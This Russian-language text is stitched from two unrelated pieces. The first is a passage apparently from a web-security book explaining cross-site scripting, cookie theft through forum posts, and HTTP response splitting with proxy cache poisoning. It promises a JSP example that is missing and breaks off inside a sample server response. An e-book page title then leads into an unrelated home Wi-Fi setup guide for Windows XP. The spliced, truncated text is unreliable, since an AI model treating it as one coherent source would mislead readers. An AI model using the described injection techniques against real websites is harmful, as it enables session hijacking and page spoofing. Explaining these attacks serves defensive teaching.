Основным различием между ними является то, что в отраженном варианте передача кода серверу и возврат его клиенту осуществляются в рамках одного HTTP запроса, а в сохраненном – в разных. Осуществление непостоянной атаки требует, чтобы пользователь перешел по ссылке, сформированной злоумышленником (ссылка может быть передана по электронной почте, ICQ и т. д.). В процессе загрузки сайта код, внедренный в URL или заголовки запроса, будет передан клиенту и выполнен в его браузере. Сохраненная разновидность уязвимости возникает, когда код передается серверу и сохраняется на нем на некоторый промежуток времени. Наиболее популярными целями атак в этом случае являются форумы, почта с веб интерфейсом и чаты. Что самое интересное в данном случае? Следующее: для атаки пользователю не обязательно переходить по ссылке – достаточно посетить уязвимый сайт!
За примерами далеко ходить не приходится: многие сайты имеют доски объявлений и форумы, которые позволяют пользователям оставлять сообщения. Зарегистрированный пользователь обычно идентифицируется по номеру сессии, сохраняемому в cookie. Если атакующий оставит сообщение, содержащее код на языке JavaScript, он получит доступ к идентификатору сессии пользователя. Многие серверы предоставляют пользователям возможность поиска по содержимому сервера. Как правило, запрос передается в URL и содержится в результирующей странице. К примеру, при переходе по URL http://portaLexample/search?q=»fresh beer» пользователю будет отображена страница, содержащая результаты поиска и фразу По вашему запросу fresh beer найдено 0 страниц. Если в качестве искомой фразы будет передан JavaScript код, он выполнится в браузере пользователя.
Расщепление HTTP запроса (HTTP Response Splitting). Для эксплуатации данной уязвимости злоумышленник должен послать серверу специальным образом сформированный запрос, ответ на который интерпретируется целью атаки как два разных ответа. Второй ответ полностью контролируется злоумышленником, что дает ему возможность подделать ответ сервера. Возможность осуществления атаки возникает, когда сервер возвращает данные, предоставленные пользователем в заголовках HTTP ответа. Обычно это происходит при перенаправлении пользователя на другую страницу (коды HTTP 3xx) или когда данные, полученные от пользователя, сохраняются в cookie.
В первой ситуации URL адрес, на который происходит перенаправление, является частью заголовка Location HTTP ответа, а во втором случае значение cookie передается в заголовке Set Cookie. Основой расщепления HTTP запроса является внедрение символов перевода строки (CR и LF) таким образом, чтобы сформировать две HTTP транзакции, в то время как реально будет происходить только одна. Перевод строки используется, чтобы закрыть первую (стандартную) транзакцию и сформировать вторую пару вопрос/ответ, полностью контролируемую злоумышленником и абсолютно не предусмотренную логикой приложения. В результате успешной реализации этой атаки злоумышленник может выполнить следующие действия.
♦ Межсайтовое выполнение сценариев.
♦ Модификация данных кэша сервера посредника. Некоторые кэширующие серверы посредники (Squid 2.4, NetCache 5.2, Apache Proxy 2.0 и ряд других) сохраняют подделанный злоумышленником ответ на жестком диске и на последующие запросы пользователей по данному адресу возвращают кэшированные данные. Это приводит к замене страниц сервера на клиентской стороне. Кроме этого, злоумышленник может переправить себе значение cookie пользователя или присвоить им определенное значение. Эта атака может быть также направлена на индивидуальный кэш браузера пользователя.
♦ Межпользовательская атака (один пользователь, одна страница, временная подмена страницы). При реализации этой атаки злоумышленник не посылает дополнительный запрос. Вместо этого используется тот факт, что некоторые серверы посредники разделяют одно TCP соединение с сервером между несколькими пользователями. В результате второй пользователь получает в ответ страницу, сформированную злоумышленником. Кроме подмены страницы, злоумышленник может также выполнить различные операции с cookie пользователя.
♦ Перехват страниц, содержащих пользовательские данные. В этом случае злоумышленник получает ответ сервера вместо самого пользователя. Таким образом, он может получить доступ к важной или конфиденциальной информации. Приведу пример JSP страницы:
Когда данная страница вызывается пользователем с параметром lang = English, она направляет его браузер на страницу /by_lang.jsp?lang=English. Типичный ответ сервера выглядит следующим образом (используется сервер BEA WebLogic 8.1 SP1) (листинг 1.9).
Листинг 1.9. Ответ сервера на запрос пользователя
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28 GMT
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003
Content Type: text/html
Компьютерные советы (сборник статей) [Юрий Иовлев] (fb2) читать онлайн
Беспроводные сети с каждым днём становятся всё более популярными, и этот факт неоспорим. При этом рост популярности беспроводного оборудования для конечных пользователей вполне сопоставим с ростом уровня жизни. Как только в доме появляется два или даже более ПК, возникает задача их объединения в локальную сеть, и лучшим вариантом для дома является именно беспроводная сеть. Другой типичный пример, когда наилучшим выбором является именно беспроводная сеть — это организация беспроводного разделяемого доступа в Интернет в условиях дома с использованием беспроводного маршрутизатора.
Чем же обусловлен рост популярности беспроводных сетей? Прежде всего, в сравнении с традиционными кабельными сетями, они обладают рядом серьёзных преимуществ, главным из которых, конечно же, является простота развёртывания. Так, беспроводная сеть не нуждается в прокладке кабелей (что нередко требует штробирования стен); также трудно оспорить такие достоинства беспроводной сети, как мобильность пользователей в зоне её действия и простота подключения к ней новых пользователей. В то же время беспроводные сети не лишены определённых недостатков. Прежде всего это низкая по сегодняшним меркам скорость соединения, которая серьёзно зависит от наличия преград и от расстояния между приёмником и передатчиком; плохая масштабируемость, а также, если речь идёт об использовании беспроводной сети в помещениях, довольно ограниченный радиус действия сети.
Впрочем, стоит отметить, что в каждом конкретном случае существуют способы преодоления всех проблем, связанных с беспроводными сетями. К примеру, радиус действия беспроводной сети может быть увеличен за счёт добавления нескольких точек доступа и построения распределённой беспроводной сети. Аналогично решается и проблема масштабируемости сети, а использование внешних направленных антенн позволяет эффективно решать проблему препятствий, ограничивающих сигнал.
В этой статье мы подробно расскажем о том, как шаг за шагом развернуть и настроить беспроводную сеть в домашних условиях.
Режимы функционирования беспроводных сетей
Как правило, к оборудованию, которое нужно для развёртывания беспроводной сети, относят беспроводную точку доступа и беспроводные адаптеры. Однако в простейшем случае для развёртывания беспроводной сети не требуется даже использования точки доступа. Дело в том, что существуют два режима функционирования беспроводных сетей: режим Infrastructure и режим Ad Hoc.
В режиме Ad Hoc, который также называют Independent Basic Service Set (IBSS) или режимом Peer to Peer (точка-точка), узлы сети непосредственно взаимодействуют друг с другом без участия точки доступа. Этот режим требует минимального оборудования: каждый клиент сети должен быть оснащён только беспроводным адаптером. При такой конфигурации не требуется создания сетевой инфраструктуры. Основными недостатками режима Ad Hoc являются ограниченный диапазон действия получаемой сети и невозможность подключения к внешней сети (например, к Интернету). К примеру, если оба беспроводных клиента (ПК с беспроводными адаптерами) находятся в одной комнате в пределах прямой видимости, то режим Ad Hoc позволяет объединить этих клиентов в беспроводную сеть. Это может оказаться удобным, когда нужно оперативно скачать данные с одного ПК на другой (к примеру, к вам зашёл друг со своим ноутбуком). Но вот если ставится задача объединить в локальную беспроводную сеть компьютеры, расположенные в разных комнатах и разделённые бетонной стеной с арматурой, то режим Ad Hoc скорее всего не подойдёт, поскольку мощности передатчиков и чувствительности приёмников для обеспечения устойчивого соединения беспроводных адаптеров будет недостаточно. В этом случае для организации беспроводной сети потребуется стационарная точка доступа. Впрочем, преимущество точки доступа заключается не только в том, что она позволяет существенно расширить зону покрытия (радиус действия) беспроводной сети.
Точка доступа в беспроводной сети выполняет функцию, аналогичную функции коммутатора традиционной кабельной сети, и позволяет объединять всех клиентов в единую сеть. Задача точки доступа — координировать обмен данными между всеми клиентами беспроводной сети и обеспечить всем клиентам равноправный доступ к среде передачи данных.
Режим функционирования беспроводной сети на базе точки доступа называется режимом Infrastructure Mode. Рассматривают два режима Infrastructure — основной режим BSS (Basic Service Set) и расширенный режим ESS (Extended Service Set). В режиме BSS все узлы сети связываются между собой только через одну точку доступа, которая может выполнять также роль моста к внешней сети. В расширенном режиме ESS существует инфраструктура нескольких сетей BSS, причём сами точки доступа взаимодействуют друг с другом, что позволяет передавать трафик от одной BSS к другой. Между собой точки доступа соединяются при помощи либо сегментов кабельной сети, либо радиомостов.
Стандарты беспроводной связи
Существует несколько типов беспроводных стандартов: 802.11a, 802.11b и 802.11g. В соответствии с этими стандартами используются различные типы оборудования. Кроме того, всё чаще встречаются точки доступа с поддержкой одновременно нескольких стандартов, например, 802.11g и 802.11a. Стандарты беспроводных сетей семейства 802.11 отличаются друг от друга и максимально возможной скоростью передачи, и радиусом действия беспроводной сети. Так, стандарт 802.11b подразумевает максимальную скорость передачи до 11 Мбит/с, а стандарты 802.11a и 802.11g — максимальную скорость передачи до 54 Мбит/с. Кроме того, в стандартах 802.11b и 802.11g предусмотрено использование одного и тот же частотного диапазона — от 2,4 до 2,4835 ГГц, а стандарт 802.11a подразумевает использование частотного диапазона от 5,15 до 5,35 ГГц. Соответственно, если точка доступа поддерживает одновременно стандарт 802.11a и 802.11g, то она является двухдиапазонной.
Оборудование стандарта 802.11a, в силу используемого им частотного диапазона, не сертифицировано в России. Это, конечно, не мешает использовать его в домашних условиях. Однако купить такое оборудование проблематично. Именно поэтому в дальнейшем мы сосредоточимся на рассмотрении стандартов 802.11b и 802.11g.
Следует учесть, что стандарт 802.11g полностью совместим со стандартом 802.11b, то есть стандарт 802.11b является подмножеством стандарта 802.11g, поэтому в беспроводных сетях, основанных на оборудовании стандарта 802.11g, могут также работать клиенты, оснащённые беспроводным адаптером стандарта 802.11b. Верно и обратное — в беспроводных сетях, основанных на оборудовании стандарта 802.11b, могут работать клиенты, оснащённые беспроводным адаптером стандарта 802.11g. Впрочем, в таких смешанных сетях заложен один подводный камень: если мы имеем дело со смешанной сетью, то есть с сетью, в которой имеются как клиенты с беспроводными адаптерами 802.11b, так и клиенты с беспроводными адаптерами 802.11g, то все клиенты сети будут работать по протоколу 802.11b. Более того, если все клиенты сети используют один и тот же протокол, например, 802.11b, то данная сеть является гомогенной, и скорость передачи данных в такой сети выше, чем в смешанной сети, где имеются как клиенты 802.11g, так и 802.11b. Дело в том, что клиенты 802.11b «не слышат» клиентов 802.11g. Поэтому для того, чтобы обеспечить совместный доступ к среде передачи данных клиентов, использующих различные протоколы, в подобных смешанных сетях точки доступа должны отрабатывать определенный механизм защиты. Не вдаваясь в подробности реализации данных механизмов, отметим лишь, что в результате использования механизмов защиты в смешанных сетях реальная скорость передачи становится ещё меньше.
Поэтому при выборе оборудования для беспроводной домашней сети стоит остановиться на оборудовании одного стандарта. Протокол 802.11b на сегодня является уже устаревшим, да и реальная скорость передачи данных при использовании данного стандарта может оказаться неприемлемо низкой. Так что оптимальный выбор — оборудование стандарта 802.11g.
Некоторые производители предлагают оборудование стандарта 802.11g+ (SuperG), а на коробках своих изделий (точках доступа и беспроводных адаптерах) помимо надписи «802.11g+» указывают ещё и скорость в 100, 108 или даже 125 Мбит/с.
Фактически никакого протокола 802.11g+ не существует, и всё, что скрывается за этим загадочным протоколом — это расширение базового стандарта 802.11g.
На самом деле, все производители чипсетов для беспроводных решений (Intersil, Texas Instruments, Atheros, Broadcom и Agere) в том или ином виде реализовали расширенный режим 802.11g+. Однако проблема заключается в том, что все производители по-разному реализуют данный режим, и нет никакой гарантии, что решения различных производителей смогут взаимодействовать друг с другом. Поэтому при покупке точки доступа стандарта 802.11g+ следует убедиться, что беспроводные адаптеры также поддерживают данный стандарт.
Проблема выбора: точка доступа или маршрутизатор
Кроме того, что точки доступа могут выполнять в виде отдельных законченных решений, существуют так называемые беспроводные маршрутизаторы, в которых беспроводная точка доступа является составной частью устройства. Соответственно, при развертывании беспроводной сети встает вопрос выбора между точкой доступа и беспроводным маршрутизатором. Выбор в пользу того или иного устройства зависит от того, как именно будет использоваться беспроводная сеть. Рассмотрим несколько типичных ситуаций.
В простейшем случае несколько компьютеров объединяются в беспроводную сеть исключительно для обмена данными между ПК. В этом случае оптимальным выбором будет точка доступа, которая подключается к одному из ПК сети (причём ПК, к которому подключается точка доступа, не должен быть оборудован беспроводным адаптером).
Во втором варианте предполагается, что помимо обмена данными между компьютерами, объединенными в беспроводную сеть, необходимо реализовать для всех компьютеров разделяемый доступ в Интернет с использованием аналогового модема (модема, который подключается к телефонной линии). В этом случае модем подключается к одному из компьютеров беспроводной сети, а Интернет-соединение настраивается в режиме разделяемого доступа. К этому же компьютеру подключается точка доступа, а на всех компьютерах беспроводной сети настраивается выход в Интернет в режиме доступа через локальную сеть. Понятно, что оптимальным решением в рассмотренном случае так же является именно использование точки доступа.
И, наконец, последний вариант топологии беспроводной сети — использование высокоскоростного доступа в Интернет с использованием DSL, кабельного модема или Ethernet-подключения. В этом случае оптимальным вариантом является использование точки беспроводного доступа, встроенной в маршрутизатор.
Маршрутизаторы являются пограничными сетевыми устройствами, то есть устройствами, устанавливаемыми на границе между двумя сетями или между локальной сетью и Интернетом, и в этом смысле они выполняют роль сетевого шлюза. С конструктивной точи зрения они должны иметь как минимум два порта: к одному из них подключается локальная сеть (этот порт называется внутренним LAN-портом), а ко второму — внешняя сеть (Интернет) и этот порт называется внешним WAN-портом. Как правило, маршрутизаторы, используемые для дома или небольшого офиса (SOHO-маршрутизаторы), имеют один WAN-порт и несколько (от одного до четырёх) внутренних LAN-портов, которые объединяются в коммутатор. В большинстве случаев WAN-порт коммутатора имеет интерфейс 10/100Base-TX и к нему может подключаться xDSL-модем с соответствующим интерфейсом либо сетевой Ethernet-кабель.
Интегрированная в маршрутизатор точка беспроводного доступа позволяет организовать беспроводной сегмент сети, которая, с точки зрения маршрутизатора, относится к внутренней сети, и в этом смысле компьютеры, подключаемые к маршрутизатору беспроводным способом, ничем не отличаются от тех, что подключены к LAN-порту.
Использование беспроводного маршрутизатора вместо точки доступа выгодно не только потому, что это позволяет сэкономить на покупке дополнительного сетевого Ethernet-контроллера или мини-коммутатора, но и потому, что маршрутизаторы предоставляют дополнительные средства защиты внутренней сети от несанкционированного доступа. Так, практически все современные маршрутизаторы класса SOHO имеют встроенные аппаратные брандмауэры, которые также называются сетевыми экранами или firewall.
Производители беспроводного оборудования
На российском рынке представлены точки доступа и беспроводные маршрутизаторы компаний 3Com, Asus, Asante, D-Link, Gigabyte, MSI, Multico, Trendnet, US Robotics, ZyXEL, SMC и др. Конечно же, перед рядовым пользователем встаёт вопрос: на оборудовании какого производителя остановиться? На самом деле, ответа на этот простой вопрос не существует. Дело в том, что этот вопрос просто лишён смысла. Корректнее было бы поставить вопрос несколько в иной плоскости: на какой именно модели того или иного производителя остановиться? Но и в данном случае однозначного ответа нет. Во-первых, в модельном ряде любого производителя есть как удачные, так и откровенно неудачные модели. К примеру, нам приходилось сталкиваться с точкой доступа D-Link, которая имела очень маленький радиус действия и не могла обеспечить стабильную связь уже с устройством, которое находилось за кирпичной стеной. Одна из точек доступа ZyXel обеспечивала очень ассиметричную и низкую скорость соединения с ноутбуком на базе мобильной технологии Intel Centrino (проблему удалось решить с выходом нового драйвера для беспроводного адаптера). И таких примеров можно привести очень много. Поэтому вряд ли имеет смысл делать ставку на конкретного производителя — нужно ориентироваться на конкретную модель. Вообще же, за редким исключением, нужно отметить, что производительность всех современных точек доступа практически одинакова. Собственно, это и не мудрено. Ведь никто из производителей беспроводного оборудования не делает самих чипов для этих устройств, а производительность определяется именно чипом. Более того, большинство производителей (как это ни странно) вообще не производит этих самых беспроводных устройств, а лишь заказывает их у третьих производителей (то есть, занимается лишь банальной перепродажей). Поэтому нередко беспроводные устройства разных производителей отличаются лишь логотипом.
Из всего сказанного выше следует, что при выборе конкретной модели беспроводного устройства в первую очередь стоит обратить внимание не на производителя, а на функциональные возможности устройства. Если речь идёт о простейшей точке доступа, то под функциональностью понимают поддержку ей тех или иных протоколов связи и их комбинации. Кроме того, немаловажными факторами являются поддерживаемые протоколы шифрования и аутентификации пользователей, а также возможность использования точки доступа в режиме моста для построения распределённой беспроводной сети со множеством точек доступа.
Если же речь заходит о беспроводном маршрутизаторе, то разнообразие в функциональных возможностях этих устройств ещё шире. Это и VPN-маршрутизаторы (маршрутизаторы с поддержкой VPN-туннелей), и возможности по организации DMZ-зоны и т. д. и т. п.
Конечно, необходимость в наличии тех или иных функциональных возможностей зависит от конкретной схемы использования беспроводного устройства. Если речь идёт о домашнем использовании, то расширенные функциональные возможности и средства по обеспечению сетевой безопасности вряд ли будут востребованы. Поэтому при выборе точки доступа или беспроводного маршрутизатора для домашнего использования стоит ориентироваться на простейшие по своим функциональным возможностям устройства — они и дешевле, и проще в настройке.
Настройка точки доступа
Для развертывания беспроводной сети прежде всего необходимо настроить точку доступа (беспроводной маршрутизатор). Предполагается, что на всех компьютерах, входящих в беспроводную сеть, используется операционная система Windows XP Professional SP2 (английская версия).
Шаг 1. Установка (изменение) IP-адреса компьютера
Для того, чтобы развернуть локальную сеть, необходимо, чтобы все компьютеры сети имели один IP-адрес одной подсети. Поскольку точка доступа также входит в локальную сеть, нужно, чтобы и её IP-адрес входил бы в ту же подсеть, что и все остальные клиенты сети.
Как правило, последовательность действий в данном случае следующая: прежде всего, необходимо выяснить IP-адрес точки доступа и пароль, заданный по умолчанию. Любая точка доступа или маршрутизатор, будучи сетевым устройством, имеет свой собственный сетевой адрес (IP-адрес). Для того чтобы выяснить IP-адрес и пароль, придётся пролистать инструкцию пользователя. Предположим, что IP-адрес точки доступа по умолчанию 192.168.1.254.
Далее необходимо подключить точку доступа к компьютеру с использованием традиционного сетевого интерфейса Ethernet (для этого на компьютере должен быть установлен сетевой Ethernet-контроллер). В случае использования беспроводного маршрутизатора подключение компьютера производится через LAN-порт маршрутизатора.
Для настройки точки доступа необходимо, чтобы компьютер, к которому подключается точка доступа, имели бы IP-адрес из той же подсети, что и точка доступа. Поскольку в нашем случае точка доступа имеет IP-адрес 192.168.1.254, то компьютеру необходимо присвоить статический IP-адрес 192.168.1.х (например, 192.168.1.100) с маской подсети 255.255.255.0.
Для присвоения компьютеру статического IP-адреса щелкните на значке My Network Places (Сетевое окружение) правой кнопкой мыши и в открывшемся списке выберите пункт Properties (Свойства). В открывшемся окне Network Connection (Сетевые соединения) выберите значок Local Area Connection (Локальная Сеть) и, щёлкнув на нём правой кнопкой мыши, снова перейдите к пункту Properties. После этого должно открыться диалоговое окно Local Area Connection Properties (Свойства сетевого соединения), позволяющее настраивать сетевой адаптер (рис. 1).
Рис. 1. Диалоговое окно Local Area Connection Properties
На вкладке General выделите протокол Internet Protocol (TCP/IP) и нажмите на кнопку Properties. Перед вами откроется диалоговое окно, позволяющее задавать IP-адрес компьютера и маску подсети. Отметьте в данном диалоговом окне пункт Use the following IP address: и введите в соответствующие текстовые поля IP-адрес и маску подсети (рис. 2).

Рис. 2. Задание статического IP-адреса и маски подсети
Шаг 2. Настройка беспроводного соединения
После того как задан статический IP-адрес компьютера, можно получить непосредственный доступ к настройкам самой точки доступа. Для этого в поле адреса Web-браузера введите IP-адрес точки доступа (192.168.1.254). Если всё сделано правильно, то перед вами откроется диалоговое окно настроек точки доступа (маршрутизатора). Возможно, предварительно потребуется ввести логин и пароль (они имеются в документации).
Используя диалоговое окно настроек точки доступа, можно задать новый IP-адрес точки доступа (если в этом имеется необходимость), однако следует помнить, что после окончания сеанса связи с точкой доступа необходимо также изменить и IP-адрес компьютера (в противном случае новое соединение с точкой доступа станет невозможным).
Если точка доступа используется только для организации локальной беспроводной сети без выхода в Интернет, то нет необходимости менять IP-адрес точки доступа. Возможно, проще поменять (или задать) IP-адреса всех беспроводных клиентов. Однако в ряде случаев изменение IP-адреса точки доступа необходимо. Например, для реализации разделяемого доступа в Интернет с использованием аналогового модема, компьютеру, к которому подключён модем, присваивается статический IP-адрес 192.168.0.1 с маской подсети 255.255.255.0. В этом случае приходится задавать IP-адрес точки доступа из той же подсети (192.168.0.х). Пример с организацией разделяемого беспроводного доступа в Интернет с использованием аналогового модема будет рассмотрен далее.
Кроме изменения IP-адреса точки доступа, используя диалоговое окно настроек точки доступа, для настройки беспроводной сети требуется задать следующие параметры:
Тип беспроводной сети. Если точка доступа поддерживает несколько беспроводных стандартов, необходимо в явном виде указать стандарт беспроводной сети (например, 802.11g+). Однако следует учесть, что жёсткое задание стандарта отсекает клиентов, не поддерживающих данный стандарт. Поэтому в некоторых случаях целесообразно указывать смешанный тип протоколов, например, 802.11b/g. Номер канала. Для беспроводного соединения точки доступа с клиентами сети могут использоваться различные частотные каналы. К примеру, в случае протокола 802.11g можно использовать каналы с первого по тринадцатый. Можно в явном виде указать, какой именно канал будет использоваться для установления соединения, а можно задать автоматический выбор канала (Enable auto channel select), причём автоматический выбор каналов предпочтительнее. SSID. Каждая беспроводная сеть имеет свой уникальный идентификатор SSID, который представляет собой условное название беспроводной сети. Для функционирования беспроводной сети необходимо, чтобы SSID точки доступа и SSID профиля беспроводного соединения на клиентах сети был бы одинаковым. Rate. Точка доступа позволяет в явном виде указать скорость (Rate) устанавливаемого соединения. Впрочем, делать это не рекомендуется, и лучше всего задать автоматическое определение скорости соединения (auto/best).
Итак, после того как все основные настройки точки доступа сделаны, можно приступать к созданию профиля беспроводного соединения на клиентах сети.
Шаг 3. Создание профиля беспроводного соединения
Настройка конкретного беспроводного адаптера, естественно, зависит от версии используемого драйвера и утилиты управления. Однако сами принципы настройки остаются неизменными для всех типов адаптеров. Кроме того, существует и общий, независимый от типа утилиты управления конкретного адаптера способ, — использовать для настройки беспроводного адаптера клиента Microsoft (встроенную в операционную систему Windows XP утилиту настройки беспроводного адаптера). Рассмотрим подробно оба способа настройки. Кроме того, учитывая популярность ноутбуков на базе мобильной технологии Intel Centrino, неотъемлемой частью которой является наличие модуля беспроводной связи, настройку беспроводного соединения мы опишем на примере драйвера Intel PROSet/Wireless (версия 9.0.1.9), используемого в ноутбуках на базе технологии Intel Centrino.
Настройка с использованием утилиты управления беспроводного адаптера
Итак, прежде всего необходимо установить драйвер беспроводного адаптера. В случае ноутбука на базе мобильной технологии Intel Centrino откроем диалоговое окно Intel PROSet/Wireless (значок этого окна находится в системном трее), с помощью которого будет создаваться профиль нового беспроводного соединения (рис. 3).

Рис. 3. Диалоговое окно настройки беспроводного соединения
Нажмите на кнопку «Добавить», чтобы создать профиль нового беспроводного соединения. В открывшемся диалоговом окне «Создать профиль беспроводной сети» (рис. 8) введите имя профиля (например, HOME) и имя беспроводной сети (SSID), которое было задано при настройке точки доступа.

Рис. 4. Диалоговое окно настройки нового профиля беспроводного сети
Далее предлагается настроить защиту беспроводной сети, но на первом этапе (этап отладки) делать этого не нужно, поэтому следующие диалоговые окна оставляем без изменений.
Настройка с использованием клиента Microsoft
При использовании для настройки беспроводного адаптера клиента Microsoft (универсальный метод, который подходит для всех беспроводных адаптеров) прежде всего следует убедиться в том, что не используется иная утилита управления адаптером.
Щелкните на значке My Network Places (Сетевое окружение) правой кнопкой мыши и в открывшемся списке выберите пункт Properties (Свойства). В открывшемся окне Network Connection (Сетевые соединения) выберите значок Wireless Network Connection (Беспроводные соединения) и, щёлкнув на нём правой кнопкой мыши, снова перейдите к пункту Properties. После этого должно открыться диалоговое окно Wireless Network Connection Properties (Свойства беспроводного сетевого соединения), позволяющее настраивать беспроводной сетевой адаптер (рис. 5).

Рис. 5. Диалоговое окно настройки беспроводного сетевого адаптера
Перейдя на вкладку «Wireless Networks» (беспроводные сети), нажмите на кнопку «Add…» (добавить) и в открывшемся диалоговом окне «Wireless network properties» (свойства беспроводного соединения) введите имя беспроводной сети (SSID) (рис. 6). Остальные поля (настройка защиты) пока оставьте без изменения.

Рис. 6. Настройка профиля беспроводного соединения
Независимо от того, какой из перечисленных способов используется для создания профиля беспроводного соединения, после его создания беспроводной адаптер должен автоматически установить соединение с точкой доступа.
Обмен данными в беспроводной сети
Если после настройки точки доступа и беспроводных адаптеров сетевых компьютеров вы попытаетесь получить доступ с одного ПК к данным, хранящимся на другом ПК, то, скорее всего, у вас ничего не получится. Дело в том, что данные, к которым необходимо организовать сетевой доступ, должны располагаться в разделяемой (shared) папке или даже на логическом диске. Поэтому на тех компьютерах, между которыми предполагается реализовать обмен данными, необходимо создать разделяемые сетевые ресурсы.
Для этого щёлкните левой кнопкой мыши на значке «My Computer» (Мой компьютер) и в открывшемся окне выберите логический диск (или папку), которую требуется сделать доступной для пользователей сети. Щёлкнув на ней правой кнопкой мыши, выберите в открывшемся списке пункт «Sharing and Security…». В открывшемся диалоговом окне (рис. 7) перейдите на вкладку Sharing.

Рис. 7. Диалоговое окно создания разделяемого логического диска
В этом диалоговом окне имеется только одна опция: «if you understand the risk but still want to share the root of the drive, click here». Это не что иное, как предупреждение о риске разделения логического диска. Если вы, несмотря ни на что, желаете сделать этот диск доступным для пользователей сети, то просто щёлкните на этой надписи. Диалоговое окно изменит свое вид, и в новом окне (рис. 8) нужно будет выбрать пункт «Share this folder on the network» (сделать данную папку (диск) доступной для пользователей сети»). Кроме того, если вы хотите, чтобы данные разделяемого диска могли изменять (а не только скачивать) пользователи сети, то необходимо дополнительно выбрать опцию «Allow network users to change my files» (разрешить пользователям сети изменять файлы).

Рис. 8. Задание опций разделяемого логического диска
Реализация разделяемого доступа в Интернет с использованием аналогового модема
Следующий важный аспект, который необходимо рассмотреть — это реализации разделяемого доступа в Интернет с использованием аналогового модема. Для этого прежде всего необходимо присвоить статический IP-адрес компьютеру, к которому подключён модем.
IP-адрес компьютера должен быть 192.168.0.1, а маска подсети — 255.255.255.0. Использование другого IP-адреса при создании разделяемого доступа в Интернет не допускается. В крайнем случае, если вы зададите другой IP-адрес, то при активизации разделяемого доступа вам будет послано уведомление об автоматическом изменении IP-адреса сервера.
Соответственно, IP-адрес самой точки доступа должен находиться в той же подсети, то есть быть равным 192.168.0.х с маской подсети 255.255.255.0. Если IP-адрес точки доступа по умолчанию отличается от указанного, то его следует сначала поменять.
После того как компьютеру будет присвоен статический IP-адрес, щелкните на значке My Network Places (Сетевое окружение) правой кнопкой мыши и в открывшемся списке выберите пункт Properties (Свойства). В открывшемся окне Network Connection (Сетевые соединения) выберите значок с названием соединения с Интернетом (название этого соединения задаётся произвольно при настройке соединения с Интернетом). Щёлкнув на нём правой кнопкой мыши, перейдите к пункту Properties и в открывшемся диалоговом окне Internet Properties (Свойства соединения с Интернетом) перейдите к вкладке Advanced.
В группе Internet Connection Sharing (Разделяемый доступ в Интернет) отметьте пункт Allow other network users to connect through this computer’s Internet connection (Разрешить пользователям локальной сети пользоваться соединением с Интернетом через данный компьютер). Тем самым вы активизируете разделяемый доступ в Интернет для всех компьютеров вашей локальной сети. Автоматически в этом диалоговом окне окажутся отмеченными и два последующих пункта. Первый из них (Establish a dial-up connection whenever a computer on my network attempts to access the Internet) разрешает устанавливать соединение с Интернетом по требованию с любого компьютера вашей сети. Даже при отсутствии в данный момент на сервере (компьютере, к которому подключен модем) непосредственного соединения с Интернетом в случае соответствующего запроса с любого компьютера сети модем начнёт набор номера провайдера и установит соединение с Интернетом.
Второй пункт (Allow other networks users to control or disable the shared Internet connection) разрешает всем пользователям сети управлять разделяемым доступом в Интернет.
После того как разделяемый доступ в Интернет будет активизирован на компьютере, необходимо проверить сетевые настройки на всех остальных компьютерах сети. В отличие от сервера, все остальные компьютеры сети не должны иметь статического IP-адреса. Для того чтобы убедиться, что это действительно так, повторите процедуру назначения IP-адреса на всех компьютерах сети, но в диалоговом окне Internet Protocol (TCP/IP) Properties отметьте пункт Obtain an IP address automatically. При этом все компьютеры локальной сети (кроме сервера) будут автоматически получать динамические IP-адреса.
Не вникая во все тонкости динамического конфигурирования сети, отметим лишь, что на сервере будет запущен специальный сервис DHCP, который и будет заниматься автоматическим распределением IP-адресов в диапазоне той же самой подсети, что и сервер, то есть в диапазоне 192.168.0.х.
По окончании настройки сервера и всех компьютеров сети можно будет пользоваться разделяемым доступом в Интернет.
Настройка защиты беспроводной сети
Если первоначальное тестирование созданной беспроводной сети прошло успешно, можно переходить ко второму этапу — настройке безопасности сети для предотвращения несанкционированного доступа в свою сеть хотя бы со стороны соседей. Конечно, если у вас за стенкой проживает бабушка — божий одуванчик, которая ничего не смыслит в компьютерных технологиях, то можно этого и не делать, но вот если у бабушки есть внуки, то лучше всё же себя обезопасить.
Прежде всего отметим, что созданная нами беспроводная сеть является одноранговой, то есть все компьютеры этой сети равноправны, и выделенный сервер, регламентирующий работу сети, отсутствует. Поэтому полагаться на политику системной безопасности в такой сети бессмысленно, поскольку подобной политики там просто нет. К сожалению, посредством операционной системы Windows XP Professional в такой сети не удастся настроить список авторизованных для доступа в сеть пользователей. Но выход всё же есть. Для этого необходимо воспользоваться возможностями точки доступа или беспроводного маршрутизатора, то есть реализовать защиту сети на аппаратном уровне.
Фильтрация по MAC-адресам
На первой «линии обороны» желательно настроить фильтрацию по MAC-адресам. MAC-адрес — это уникальный (в том смысле, что не может быть двух одинаковых) идентификатор конкретного сетевого оборудования, например, беспроводного адаптера или точки доступа. MAC-адрес записывается в шестнадцатеричном формате. Например, MAC-адрес может быть записан в виде 00-0 F-EA-91-77-9 B. Для того чтобы выяснить MAC-адрес установленного беспроводного адаптера, нажмите кнопку «Start» (Пуск) и в появившемся списке выберите пункт «Run…» (Выполнить). В открывшемся окне наберите команду «cmd» (рис. 9), что приведёт к запуску окна командной строки.

Рис. 9. Запуск окна командной строки
В командной строке наберите команду «ipconfig/all» (рис. 10).

Рис. 10. Выполнение команды «ipconfig/all»
Это позволит выяснить IP-адрес беспроводного адаптера и его MAC-адрес.
После того как будут выяснены MAC-адреса всех компьютеров в сети, необходимо настроить таблицу фильтрации по MAC-адресам на точке доступа. Практически любая точка доступа и маршрутизатор предоставляют подобную возможность. Настройка этой таблицы сводится, во-первых, к необходимости разрешить фильтрацию по MAC-адресам, а во-вторых, к внесению в таблицу разрешённых MAC-адресов беспроводных адаптеров. После настройки таблицы фильтрации по MAC-адресам любая попытка входа в сеть с использованием беспроводного адаптера, MAC-адрес которого не внесён в таблицу, будет отвергнута точкой доступа.
Настройка режимов шифрования и аутентификации пользователей
Любая точка доступа, и тем более беспроводной маршрутизатор, предоставляют в распоряжение пользователей возможность настраивать шифрование сетевого трафика при его передаче по открытой среде. Существует несколько стандартов шифрования, которые поддерживаются точками доступа.
